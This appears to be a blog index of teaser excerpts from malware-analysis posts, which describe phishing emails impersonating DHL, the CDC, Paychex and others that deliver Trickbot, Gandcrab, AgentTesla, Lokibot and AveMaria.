Fake DHL email delivers an unknown keylogger coupled with a phishing scam

I was extremely surprised to wake up this Sunday Morning to a whole slew of fake DHL delivery notice emails with a macro enabled  word doc attachment that eventually downloads some sort of Keylogger. There is some dispute as to what the actual Keylogge… Continue reading Fake DHL email delivers an unknown keylogger coupled with a phishing scam

Fake order eventually drops Lokibot but something else happens

I am not entirely sure what the in initial binary download with this one is, but there are indications it might be Dark Comet RAT. What we do know is that it drops a Lokibot binary The word doc is actually a RTF file containing embedded ole objects. Th… Continue reading Fake order eventually drops Lokibot but something else happens

More AgentTesla keylogger info-stealer campaigns hitting UK

We are still seeing continuous AgentTesla keylogger / Info-Stealer campaigns hitting the UK. We sill aren’t seeing a lot of other malware at the moment. I have received about 20 different versions over the last week that have all been nothing spe… Continue reading More AgentTesla keylogger info-stealer campaigns hitting UK

Fake order delivering AveMaria stealer with difficult office doc.

I had a bit of  a problem trying to analyse this malware today. The word doc looks pretty average at first glance, but trying to run it in Anyrun  on a W7 32 or 64 bit version of windows. gave me VBA errors. It also wouldn’t run on 64 bit version… Continue reading Fake order delivering AveMaria stealer with difficult office doc.

Trickbot via fake Efax message using Squiblydoo, Active X, macro and abusing pastebin

We are seeing massive changes with the Trickbot delivery campaign overnight. I have only seen 1 mention on  Twitter about this campaign and 1 on a private malware research mailing list, so it can’t be affecting too many recipients. This example i… Continue reading Trickbot via fake Efax message using Squiblydoo, Active X, macro and abusing pastebin

Fake DHL Urgent Delivery notice delivers Gandcrab 5.2 ransomware

Yet another Gandcrab ransomware campaign. This time spoofing DHL Express with a fake delivery notification email.  This delivers Gandcrab 5.2 ransomware that currently does not have free decryption available yet. This bad actor is getting a bit lazy an… Continue reading Fake DHL Urgent Delivery notice delivers Gandcrab 5.2 ransomware

Fake CDC Flu Pandemic Warning delivers Gandcrab 5.2 ransomware

A somewhat interesting and slightly alarming malware campaign, spreading worldwide but supposed to be targeting the USA  that pretends to be an urgent message from the CDC ( Centre for Disease Control ) warning about a flu outbreak. This delivers Gandc… Continue reading Fake CDC Flu Pandemic Warning delivers Gandcrab 5.2 ransomware

Fake Paychex Tax verification documents delivers Trickbot

There are still using this new version of the Trickbot delivery system where Bitsadmin is used to download the payload in small sections to a victims computer where it is all joined together to make 1 file. This example is today’s latest spoof or imita… Continue reading Fake Paychex Tax verification documents delivers Trickbot

Fake Dun & Bradstreet Company Complaint delivers Trickbot

Continuing with the recent changes to the Trickbot delivery system and possibly the payloads and configs today. This example is today’s latest spoof or imitation of a well-known company, bank or public authority delivering Trickbot banking Trojan. The … Continue reading Fake Dun & Bradstreet Company Complaint delivers Trickbot